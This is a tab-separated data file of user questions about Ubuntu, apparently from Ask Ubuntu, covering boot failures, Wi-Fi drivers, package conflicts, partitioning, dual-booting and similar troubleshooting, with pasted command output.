379531	ubuntu reinstalled by itself ?	so as i normally turn my pc on when i get back from school i booted into ubuntu and logged in and the os is reinstalled without me reinstalling it . keep note that no one else uses this computer so this happened by itself . i lost a lot of files am i able to recover them ?
379532	external usb hard drive not in /dev at boot	i have a seagate usb external hdd , which is always connected to my server ( a re-purposed laptop running ubuntu server 12.04 ) . it has one ext3 volume . if the drive is connected when the machine boots , it does n't appear to be detected ; there is no entry for it in /dev , and it is n't listed by fdisk -l. however , if i unplug the drive and plug it back in , it 's detected normally and i 'm able to mount it . i 'm guessing this probably has to do with when usb support is loaded during the boot process , but i 'm not really sure where to proceed from here . edit : i 'm updating with the output of fdisk -l before and after re-plugging-in the drive . output of fdisk -l after boot : disk /dev/sda : 40.0 gb , 40007761920 bytes 255 heads , 63 sectors/track , 4864 cylinders , total 78140160 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0000b77d device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 78139391 38818817 5 extended /dev/sda5 501760 78139391 38818816 8e linux lvm disk /dev/mapper/gwynn -- vg-root : 39.2 gb , 39162216448 bytes 255 heads , 63 sectors/track , 4761 cylinders , total 76488704 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/gwynn -- vg-swap_1 : 532 mb , 532676608 bytes 255 heads , 63 sectors/track , 64 cylinders , total 1040384 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 output of fdisk -l after unplugging the drive and plugging it back in : disk /dev/sda : 40.0 gb , 40007761920 bytes 255 heads , 63 sectors/track , 4864 cylinders , total 78140160 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0000b77d device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 78139391 38818817 5 extended /dev/sda5 501760 78139391 38818816 8e linux lvm disk /dev/mapper/gwynn -- vg-root : 39.2 gb , 39162216448 bytes 255 heads , 63 sectors/track , 4761 cylinders , total 76488704 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/gwynn -- vg-swap_1 : 532 mb , 532676608 bytes 255 heads , 63 sectors/track , 64 cylinders , total 1040384 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sdb : 1000.2 gb , 1000204883968 bytes 81 heads , 59 sectors/track , 408772 cylinders , total 1953525164 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xb8e593ca device boot start end blocks id system /dev/sdb1 2048 1953525163 976761558 83 linux also , output from dmesg at the time of un-/re-plugging : [ 84445.475487 ] usb 1-1 : usb disconnect , device number 2 [ 84449.000409 ] b44 ssb1:0 eth0 : link is down [ 84458.292168 ] usb 1-1 : new high-speed usb device number 3 using ehci-pci [ 84458.428387 ] usb 1-1 : new usb device found , idvendor=0bc2 , idproduct=5033 [ 84458.428398 ] usb 1-1 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 84458.428423 ] usb 1-1 : product : freeagent goflex [ 84458.428430 ] usb 1-1 : manufacturer : \xffffffd0\xffffff89\xffffff89\xffffffd0\xffffff9a\xffffff9a [ 84458.428453 ] usb 1-1 : serialnumber : na0caa07 [ 84458.444271 ] scsi3 : usb-storage 1-1:1.0 [ 84459.445977 ] scsi 3:0:0:0 : direct-access seagate freeagent goflex sa11 pq : 0 ansi : 4 [ 84459.464838 ] sd 3:0:0:0 : attached scsi generic sg2 type 0 [ 84459.466359 ] sd 3:0:0:0 : [ sdb ] 1953525164 512-byte logical blocks : ( 1.00 tb/931 gib ) [ 84459.467368 ] sd 3:0:0:0 : [ sdb ] write protect is off [ 84459.467381 ] sd 3:0:0:0 : [ sdb ] mode sense : 1c 00 00 00 [ 84459.469411 ] sd 3:0:0:0 : [ sdb ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 84459.517776 ] sdb : sdb1 [ 84459.524602 ] sd 3:0:0:0 : [ sdb ] attached scsi disk [ 84614.000504 ] b44 ssb1:0 eth0 : link is up at 100 mbps , full duplex [ 84614.000534 ] b44 ssb1:0 eth0 : flow control is off for tx and off for rx
379533	unable to connect to wifi : password not accepted	i 'm running ubuntu 13.10 on my desktop . i installed ndiswrapper and the bcm 43236 driver as recommended by luis alvaro . my wifi network is detected . the windows wireless drivers shows bcmwlhigh5 , hardware present . however networkmanager keeps asking for my password , i can not get online . thanks for your thoughts guys , problem `` solved '' cisco linksys n600 usb adapter ae2500 does not work `` out of the box '' ! wpa and wpa2 psk are the culprits , hacked the wireless router and disabled security , now everything is working fine : - )
379534	how can you use pam-dbus without using gnome	i have been playing around with pam-dbus on a old slow box that is too slow for gnome/kde so i have been using ratpoision as the window manager . i was able to configure it to show a notification on the desktop whenever an authentication attempt was made , but i ca n't figure out how to approve/disapprove the attempt .
379537	trying to overwrite 'file ' which is also in package 'name '	after i added this ppa ppa : thopiekar/darling and tried to install darling without success , i ca n't fix anything with the sudo apt-get install -f install command jeggy @ jeggy-xps : ~ $ sudo apt-get -f install [ sudo ] password for jeggy : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : gnustep-gui the following new packages will be installed : gnustep-gui 0 upgraded , 1 newly installed , 0 to remove and 6 not upgraded . 1 not fully installed or removed . need to get 0 b/3.569 kb of archives . after this operation , 12,4 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 283062 files and directories currently installed . ) unpacking gnustep-gui : amd64 ( from ... /gnustep-gui_0.23.1-0~201311190000~7545~7~ubuntu13.10.1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/gnustep-gui_0.23.1-0~201311190000~7545~7~ubuntu13.10.1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/gnustep/colorpickers/standardpicker.bundle/standardpicker ' , which is also in package gnustep-gui-runtime 0.22.0-1ubuntu1 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/gnustep-gui_0.23.1-0~201311190000~7545~7~ubuntu13.10.1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) jeggy @ jeggy-xps : ~ $ could someone help me to fix this ?
379540	13.10 wo n't boot after installation	i have a samsung q30+ laptop ( see http : //www.cnet.com.au/samsung-q30-plus-240064143.htm ) , vintage 2007 . i have been running ubuntu 12 without any problems . after notification of an update to 13.10 , i decided to do a clean install of 13.10 ( 32bit ) using an iso dvd . i had no problems with the install but when the system rebooted ( dvd ejected ) , all i got was a blinking cursor in the top left of a black screen . nothing seemed to get it passed this impasse . i tried a number of clean installs of 13.10 but all ended up in the same place . i am an ameuter at ubuntu and have n't a clue what to try ( except to wonder if it has anything to do with a new boot option ) . i 'd hate to have to go back to windows ! can anyone help ?
379541	13.10 wifi disconnects frequently , weak signal	thanks for your help in advance ! wifi worked fine on windows 8 , and still works fine on my flatmates ' macbooks and windows 7 . with ubuntu 13.10 though , it started to randomly disconnect after about 15-30 minutes of use , then it ca n't connect for an hour or so . help ? here 's my wireless info : http : //pastebin.com/6q8svm7n
379542	accessing a domain on a local network	i have an ubuntu server and a couple of domain names . i can access the right sites on apache via my domains , but only from outside my home network . how can i get my domain to work from within my network ? cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.1.1 search localdomain ifconfig eth0 link encap : ethernet hwaddr 00:0c:29:30:78 : c5 inet addr:192.168.65.130 bcast:192.168.65.255 mask:255.255.255.0 inet6 addr : fe80 : :20c:29ff : fe30:78c5/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:9126 errors:0 dropped:0 overruns:0 frame:0 tx packets:5106 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:8134950 ( 8.1 mb ) tx bytes:461069 ( 461.0 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:2708 errors:0 dropped:0 overruns:0 frame:0 tx packets:2708 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:209619 ( 209.6 kb ) tx bytes:209619 ( 209.6 kb ) route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.65.2 0.0.0.0 ug 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 192.168.65.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 output on client machine : iptables -l chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination
379546	black screen after boot of ubuntu 13.10	i installed ubuntu 13.10 recently , and it worked fine initially . but suddenly when i want to start system , only black screen appears . of course i searched the internet , but all solutions suggest some changes in grub or linux files . problem is that i do n't have anything called grub and i ca n't access linux screen , so i also ca n't change anything in it . so my question is , is it possible to repair it somehow from bios or do i need to reinstall ubuntu from scratch ? also , if i install it alongside current installation , will it be somehow possible to get the new installation to the same state as that of the old ? meaning that applications installed will be quickly installed in new installation .
379547	how to install python-qt3 ?	i 'm new in linux environment and i need to install python-qt3 on ubuntu 13.10 . how can i install it ?
379550	how can i install ubuntu and windows 7 on the same ssd , then use another drive for data storage	i have a small ssd ( 120gb ) , and a much larger drive ( 3tb ) , and want to install both os 's onto the ssd and use the 3tb one for data and gaming storage . is this possible , and easily doable ? the main thing comes down to getting the bootloader to allow me easy swapping between os 's , and then getting windows to install programs and the like onto the 3tb drive instead of the ssd . how can i do this ?
379552	how can i move all files and folders from multiple directories ?	so i am writing this bash script to do all sorts of things but the last step is to move the contents of four different directories into one spot so i can run a shred command or remove or something like that ( not sure what yet ) . this is what i have so far for dir in $ dir1 $ dir2 $ dir3 $ dir4 ; do mv -vi ./* $ cycl done would this loop remove all files and folders from those directories at once ? or would i have to change it ? edit : changed code . there was a function in there that i replaced with the original code
379554	dual boot on mac with osx system drive encrypted by file vault ?	i have macbook pro and the system drive is encrypted by filevault . i would like to cut a chunk from that system drive for ubuntu . how should i proceed ? does encryption need to be removed first and then just follow any tutorial or ?
379555	libc6 missing or wrong version	after my laptop shut down in the middle of an update , my ubuntu 12.04 installation is seriously messed up . when starting ubuntu , it complains `` running in low-graphics mode , screen , graphic cards qnd input device settings could not be detected correctly `` and i can only open the terminal . next i tried : apt-get -f install this gives me an `` internal error , no file name for libc6 '' . i 've tried a few more things but each time i run into errors : sudo dpkg -- configure -a this gives me `` dependency problems , errors were encountered while processing libc6 , libc6-dev .. most `` interesting '' error was the one i get when trying to configure libc6 : dpkg -- configure libc6 this results in : libc6 : amd64 2.15-0ubuntu10.5 can not be configured because libc6 : i386 is in a different version ( 2.15-0ubuntu10.4 ) any ideas how to solve this ? help would be highly appreciated ! edit : output of sudo apt-get check i get : `` the following packages have unmet dependencies : cpp-4.6 : depends : gcc-4.6-base ( = 4.6.3-1ubuntu5 ) but is not installed '' and then the same for a whole bunch more packages g++4.6 , gcc-4.6 , gfortran-4.6 ... but for libc6 it 's different : libc6 : breaks : libc6 : i386 ( ! =2.15-0ubuntu10.4 ) but 0ubuntu10.5 is installed â
379557	awn multiple docks , with different settings	i am able to add a dock in the preferences of the dock i use now ( avant window navigator ) , but the problem is that the `` add new dock '' button creates a copy , and if i change something on one dock , then the same exact thing happens to the other dock . this happens no matter how carefull i am to make different preferences for each dock , they still work as if it is just a copy . i need them to have different things on them , how do i do that ?
379558	no headphones fp audio on audiotrak prodigy 7.1e x-fi	the above pci-e soundcard has a dedicated dac for headphones . it is being recognized by ubuntu 13.10 as `` headphones sb1040 '' , when i connect a 3.5mm jack to the front audio , yet i am unable to play a sound through the headphones . connecting a jack to the rear 3.5mm 'headphones ' creates sound , but it is not recognized by ubuntu as a separate `` headphones sb1040 '' output . the problem is the fp jack which is recognized as an additional output and does not create any sound .
379564	set ubuntu partition back to active and boot with chameleon	i recently installed os x ( hackintosh ) on my pc on a partion , alongside windows and ubuntu . after some try with settings bootloader and other , my ubuntu partition is no more active . grub has been replaced with a non-working bootloader , so i restored windows default bootloader . so now , i have 3 oses on my pc , but when pc turns on just windows starts . if i previously load an external bootloader i can boot os x but there 's no way to run ubuntu . although this question seems to be related more on chameleon the main question is : how can i set back the partition of ubuntu to active ( seen that it is the only os i can no more boot ) and how can i run it alongside os x and windows ( possibly using chameleon , but i would n't dislike using of other bootloaders )
379565	just updated to 13.04 from 12.xx- system hangs on mouse pointer	just updated . my system boots to login fine . enter password , then screen goes to a black background and the white mouse pointer is displayed and the rest of the desktop boot fails , leaving it on black with a moving mouse pointer . for hours . any ideas ? i can re-install again but have done it twice and same issue .
379569	what is meant by terminal	new ubuntu 12.04 lts user here . i have downloaded google earth , it shows as its downloaded but says it must be operated from a terminal . could someone please explain what terminal means in that context . thanks , steve
379572	how do i get fsck to fix the errors it is reporting ?	on my laptop with a ssd , executing the following command : sudo fsck -f -e fragcheck /dev/sda1 results in several hundred occurrences of a message similar to this ( this is one exact message , the others have different numbers ) : 3023363 ( f ) : expecting 5845074 actual extent phys 11049254 log 8 len 2 my expectation is that fsck should correct errors . but when i execute the command again , the same errors are reported . what additional switches are required to get fsck to correct these errors ? what exactly does this error mean ( i am looking for something more informative than it was expecting one number but found another ) ? is there any documentation that describes this specific error message ?
379574	how to install gerix-wifi-cracker ?	i 've tried to install gerix-wifi-cracker on ubuntu 13.10 , but it was unsuccessful . does anyone know how to install it ?
379578	ca n't access ubuntu on my pc	someone was trying to help me about a year ago . when i try to input my password the computer switches to the terminal window . they suggested that i download a new version of ubuntu and install it in my pc . i do n't know how to initialize a disc to download and run a new version of ubuntu . can someone walk me through the process ?
379579	ubuntu 13.10 doesnt boot after upgrade from 13.04	i recently updgrated ubuntu desktop from 13.04 to 13.10 and it didnt boot anymore , it freezes with a purple screen . i made boot-repair but didnt help , this is the link provided http : //paste.ubuntu.com/6445019/ please , any help will be thankful !
379582	bash : ./mono : no such file or directory	i downloaded something off the internet for my ubu12.04x86 and whenever i cd to that directory and try ./mono is gives me bash : ./mono : no such file or directory mono is a type of .net- > deb container for aplications allowing some programs to run on linux that were made for windows also even though i have set allow executing file as program , when i double click it doesnt ask me whether to display cancel run or runterminal option why ?
379590	how can i install the necesarry drivers for my printer without web connection ?	i know a lot of people have similar questions but i looked and did not find any that helped me . i am running ubuntu and osx on my macbook pro . i have tried to get connected to the internet ... i tried ethernet , wifi , downloaded broadcom drivers ... nothing worked . i 've given up on that for now . i 'll be satisfied if i can print from ubuntu so now the question is how do i get the driver for my hp envy 4500 and then install it in my ubuntu partition . i do n't know what information you 'll need so i ca n't think of anything else that would help you help me . thanks , i really appreciate any help .
379592	wifi authentication not accepted on samsung nc10	so , im a complete ubuntu/linux noob . i installed 12.04 on my samsung nc10 and it keeps asking for password authentication when connecting to wifi , i know the password is correct and the wifi worked fine in windows xp . i looked on some other posts but am a bit lost as they all seemed to have different answers , before i go typing things into the terminal i shouldnt can anyone help ? cheers
379595	how to turn second partition into extra space	i had my hard disk split into two partiions , with 12.04 on one that does work , and 12.10 which does n't properly . the hard disk is 250 gigs , and its about evenly split . problem is , ubuntu 12.04 has maxed out it 's half . so i 'm wondering how or if i can just turn the 12.10 side of ubuntu into extra storage space for my working copy of 12.04 ? can i turn the other partition into basically a second drive letter ?
379599	ubuntu corrupting all my files for use on other machines	i have recently made the switch to ubuntu from windows , but am encountering a bizarre problem . i installed ubuntu 13.10 x64 ( dual booted with windows 7 ) on my machine , but every file i use with it becomes locked to my machine , i.e . if i attempt to use it on another , be it windows or ubuntu ( i tried with an install of 12.04 lts ) says the file is corrupted , shows a blank document , replaces content with hashes ( ' # # # # # ' ) , if it is a hard drive it will be recognized but wo n't show in 'my computer ' etc . it does n't matter if the file was created on my ubuntu install or another machine , as soon as i open with ubuntu , it will not work on any other machine except for my linux box . i do n't really know where to being with what is causing the problem as i am still pretty new to linux in general . the only thing i could think of would be something to do with permissions/ownership , but the symptoms seem rather extreme , has anyone else had experience of this problem or ideas of how to go about fixing it ? ideally i would do a clean install , but i ca n't risk not being able to access my data on the new install and losing them completely . i am using gnome 3 with ubuntu if that makes any difference . thanks in advance .
379603	how do i encrypt my drive during installation ?	how do i encrypt my drive on ubuntu ? i was told that during the installation there would be an option to encrypt my drive , this was never offered .
379608	modify nautilus sidbar device list	i use squashfuse to mount squashfs-images without needing to use sudo . i mount the image with squashfuse and unmount with fusermount -u . this works well , but nautilus displays the mounted squashfs-image as well . when i try to un-mount the image by clicking on the un-mount button in nautilus it fails with this error message : unable to unmount image umount : /home/tech/image is not in the fstab ( and you are not root ) '' i do n't feel like sorting out the i 'd really rather not have this or any other mounted images in my disk list . is it possible to configure nautilus to hide certain types of mount points ? other info : i 'm running ubuntu 13.10 64 bit . nautilus is behaving properly in my opinion , but not the way i want . also note the that unity bar does n't show the `` disk '' which makes me think this is a nautilus configuration task .
379609	what version of ubuntu should i install given my need for a secure web client ?	i am totally new to ubuntu , and wish to install it on a virtual server . my reasons and implementation desires are listed below . would ubuntu server or desktop be most suitable for me ? would the 32 or 64 bit version be more suitable for me ? thank you purpose : a secure computer for internet access to banking , etc which will only be used for this purpose , and maybe turbotax if it runs on ubuntu . host : centos 6 server without gui running on x86_64 box located in my garage with existing wifi to my home network . intended vm software : virtualbox using phpvirtualbox . how i will access it : probably remote desktop via windows 7 pcs , and restrict to clients located on my lan . [ root @ desktop logs ] # cat /proc/cpuinfo processor : 0 vendor_id : genuineintel cpu family : 6 model : 58 model name : intel ( r ) core ( tm ) i5-3330 cpu @ 3.00ghz stepping : 9 cpu mhz : 1600.000 cache size : 6144 kb physical id : 0 siblings : 4 core id : 0 cpu cores : 4 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm ida arat epb xsaveopt pln pts dts tpr_shadow vnmi flexpriority ept vpid fsgsbase smep erms bogomips : 5986.54 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : processor : 1 vendor_id : genuineintel cpu family : 6 model : 58 model name : intel ( r ) core ( tm ) i5-3330 cpu @ 3.00ghz stepping : 9 cpu mhz : 1600.000 cache size : 6144 kb physical id : 0 siblings : 4 core id : 1 cpu cores : 4 apicid : 2 initial apicid : 2 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm ida arat epb xsaveopt pln pts dts tpr_shadow vnmi flexpriority ept vpid fsgsbase smep erms bogomips : 5986.54 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : processor : 2 vendor_id : genuineintel cpu family : 6 model : 58 model name : intel ( r ) core ( tm ) i5-3330 cpu @ 3.00ghz stepping : 9 cpu mhz : 3001.000 cache size : 6144 kb physical id : 0 siblings : 4 core id : 2 cpu cores : 4 apicid : 4 initial apicid : 4 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm ida arat epb xsaveopt pln pts dts tpr_shadow vnmi flexpriority ept vpid fsgsbase smep erms bogomips : 5986.54 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : processor : 3 vendor_id : genuineintel cpu family : 6 model : 58 model name : intel ( r ) core ( tm ) i5-3330 cpu @ 3.00ghz stepping : 9 cpu mhz : 3001.000 cache size : 6144 kb physical id : 0 siblings : 4 core id : 3 cpu cores : 4 apicid : 6 initial apicid : 6 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm ida arat epb xsaveopt pln pts dts tpr_shadow vnmi flexpriority ept vpid fsgsbase smep erms bogomips : 5986.54 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : [ root @ desktop logs ] #
379616	user name and password changes	after getting `` can not write bytes : broken pipe '' message and being unable to boot , i reloaded 12.04 , my user name had some upper case letters in it and i was unable to log in . maybe the password changed also . how can i log in and reset my password and user id ?
379621	upgrading ubuntu from 10.10 to 12.04 with live usb	i 've been running ubuntu 10.10 netbook remix for many years and did n't really understand that i had to update it to keep it running well . now everything is extremely out of date and i 'm having a hard time running anything on my computer anymore . i tried doing updates ( via update manager and sudo apt-get update ) as well as doing an upgrade , many many times ( consulting ubuntu forums constantly ) and for many reasons they never worked . so i thought i would start over and just install from scratch from a live usb . i created the usb properly with ubuntu 12.04 , but my computer ( currently running 10.10 ) wo n't boot from the disk . it works on other computers - which is how i know i did it properly . i 'm a ubuntu novice , what can i do ?
379622	wget download list to specific directories	i would like to create a short but sweet script for wget to use a .list file . the catch is that i 'd like to set directories that these files go into . example : file : url.list [ group 1 ] http : //www.somehost.com/files/tool.7z http : //www.someotherhost.com/files/icon36.png [ group 2 ] http : //www.idunno.net/other-tool.tar.gz http : //265.265.265.265/config.ini http : //www.myownsite.com/tools/script-to-run-tool.cmd eof ( [ group 1 ] and [ group 2 ] are just here for readability , they are not in my real list file ) ( yeah i know 265 is n't real , that 's why it 's an example ) command ( currently using which can not parse folders ) wget -- continue -- timestamping -- content-disposition -i url.list of course , this currently downloads all 5 files to the same directory . my question is , is there a way to tell wget to use a different folder for group 1 , and for group 2 , in my case i 'd like this to grab several tools that i use at work , i have a separate script in windows that creates a winpe usb key and injects all tools in these directories to the key . so my ultimate question , can this be done super easy , or does it require me to use a full bash script to grab them and create the folders for them to go in and move them there ? ( using -o in wget screws with my timestamping , and timestamps are mission critical ) in theory when this finishes , i would like to have a fresh copy of ( psuedo names ) : tools/cool-tool/tool.7z tools/cool-tool/icon36.png tools/special-tool/other-tool.tar.gz tools/special-tool/config.ini tools/special-tool/script-to-run-tool.cmd
379624	i can not login to ubuntu 13.04	after installation , system requierd resart now . after the restart system directly login to windows 8 . i can not see the ubuntu for choose to login .
379626	ca n't make minecraft executable	i 've tried lots of things , but it just would n't work . i 'm going to properties and then to permissions but the executable check box is n't there . all there is in the permissions tab is : general emblems permissions owner : name access : ethier ( none , read only , write only , read and write ) group : name access : ethier ( none , read only , write only , read and write ) others : etheir ( none , read only , write only , read and write ) how to install minecraft ?
379632	wireless notification when session start in kubuntu	when kde is charging appears a notifications this one disappears and appears again when my desktop is shown . it says i am connected to a wireless net but this did not happen until i updated the system . this is annoying because the notification does n't disappears by itself i must click it for that . i tried searching in notifications preferences but i cant find it . does anyone know how to fix this ?
379633	make `` super/window '' as compose key in ubuntub	somehow on my new x230t lenovo thinkpad , ubuntu 13.10 only lets me have the following options as the compose key : right alt , right ctrl , left alt , right win , menu , caps lock i really do n't care for unity 's functions using super . i would like to set this as my compose key . is there any way to manage this ? update : this solution had been working like a charm for me , until today when ubuntu did a fateful update . i looked at the d-conf editor for the entry below . it still shows 'compose : lwin ' as an option . but left window is no longer available as an option in the keyboard settings . any suggestions ? ( i am using ubuntu 14.04 now )
379639	ethernet connection failed after installing wubi	i downloaded and installed ubuntu for desktop on my pc and it failed at reboot bringing me a few commands to use which were unhelpful . i rebooted my computer and went back to my original windows 8 os and deleted the ubuntu file in my `` c '' drive . i realized after completely deleting the file from my hard drive that i had no internet connection . windows labeled the connection as limited and i had no way to go back to my original setting before installing wubi . i have no internet connection on my desktop and i 'm now using my macbook . if anybody can help me get back internet connection that would be awesome . my internet connection is connected straight from my router to my computer . this is n't a router or modem problem because i get perfect wifi on my phone and computer but still nothing for my desktop .
379640	issue making bootable usb of ubuntu for mac	i 've gotten everything to work up until the 9th step , going by what is on the help.ubuntu.com page . when it says '' execute sudo dd if=/path/to/downloaded.img of=/dev/diskn bs=1m ( replace /path/to/downloaded.img with the path where the image file is located ; for example , ./ubuntu.img or ./ubuntu.dmg ) . '' when i put that into terminal and press enter nothing happens . granted , i 'm not very good at using command line , but any help would be much appreciated . how it can be done ?
379641	`usermod : user 'mahmoud ' does not exist dpkg : error processing kismet ( -- configure ) ` error when installing kismet	i am kind of new to ubuntu , and i had nothing wrong until i upgraded my system to ubuntu 13.10 . while the upgrading process i got an error message that kismet can not be downloaded , and when i figured out that it is a sniffing tool i thought that i will not need it anyway . but after installing gpointing-device-settings and some other softwares ; i get this error shown below ; i have my software installed but i just want to understand why i get this error ; why it is related to kismet and do i need to install kismet ? ! reading package lists ... done building dependency tree reading state information ... done gpointing-device-settings is already the newest version . the following packages were automatically installed and are no longer required : libaccounts-qt5-1 libc-ares2 libdee-qt5-3 libllvm3.1 : i386 libqt5graphicaleffects5 libqt5network5 libqt5qml5 libqt5quick5 libqt5svg5 libqt5v8-5 libqt5xml5 libsignon-qt5-1 libsmi2ldbl libwireshark-data libwireshark2 libwiretap2 libwsutil2 linux-headers-3.5.0-17 linux-headers-3.5.0-18 linux-headers-3.5.0-18-generic qtdeclarative5-accounts-plugin qtdeclarative5-friends-plugin qtdeclarative5-qtquick2-plugin qtdeclarative5-ubuntu-ui-toolkit-plugin ubuntu-ui-toolkit-theme wireshark wireshark-common use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up kismet ( 2011.03.r2-2 ) ... usermod : user 'mahmoud ' does not exist dpkg : error processing kismet ( -- configure ) : subprocess installed post-installation script returned error exit status 6 no apport report written because maxreports is reached already errors were encountered while processing : kismet e : sub-process /usr/bin/dpkg returned an error code ( 1 )
379647	failed to create symbolic link ‘/usr/bin/utserver’ : file exists	i started installing utorrent wrt . when i try to install utorrent till this step it is fine sudo chmod -r 777 /opt/utorrent-server-v3_0/ after this step when i proceed futher and giving the next command sudo ln -s /opt/utorrent-server-v3_0/utserver /usr/bin/utserver then i get : failed to create symbolic link ‘/usr/bin/utserver’ : file exists and the file in /usr/bin is broken . any idea how to fix this ?
379648	what is the current state of the planed features of ubuntu-touch	i think that title explains everything . i 've found this guide here explaining how to install ubuntu on nexus 7 . cause i 'm working on ad hoc connection encryption for my thesis and i have n't found any android rom/kernel implementing rsn encryption for them , before of doing `` risky '' procedure to install ubuntu , i want to ask if this feature is present .
379653	login screen on 13.10 keeps looping back to login ( xorg/nvidia problem ? )	upgraded from 12.04 to 13.10 . seemed to go ok , but when rebooted the login screen was very low resolution with trailing mouse , so purged the nvidia drivers , then reinstalled via ppa as in www.howopensource.com seemed to go ok ( no screen errors , the login screen is now normal resolution ) but when i login it loops back after a minute to the login screen again . i can login using ctrl+alt+f1 the guest account has same problem . removed .xauthority and reinstalled xorg as mentioned here : ubuntu 13.04 login loop installed gdm as here : stuck at login screen but it failed to load ( could only login into tty ) errors in xorg.0.log : nvidia ( 0 ) : failed to initialize the glx module ; please check in your x log file that the glx module has been loaded in your xserver , and that the module is the nvidia glx module . if you continue having these problems , please try reinstalling the nvidia driver . lspci -nnk | grep vga -a1 shows : 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gt218 [ geforce 210 ] [ 10de:0a65 ] ( rev a2 ) subsystem gigabyte technology co. , ltd device [ 1458:34d5 ] 02:00.0 vga compatible controller [ 0300 ] : nvidia corporation gt218 [ geforce 210 ] [ 10de:0a65 ] ( rev a2 ) subsystem gigabyte technology co. , ltd device [ 1458:34d5 ] was running 12.04 on this machine for more than a year .
379654	how do i stop skype from playing my pc audio to my friend ?	so i can use skype perfectly fine . my friends can hear me perfectly . the thing that 's wrong is that they can also here my pc . they can , hear themselves , youtube , games , etc .
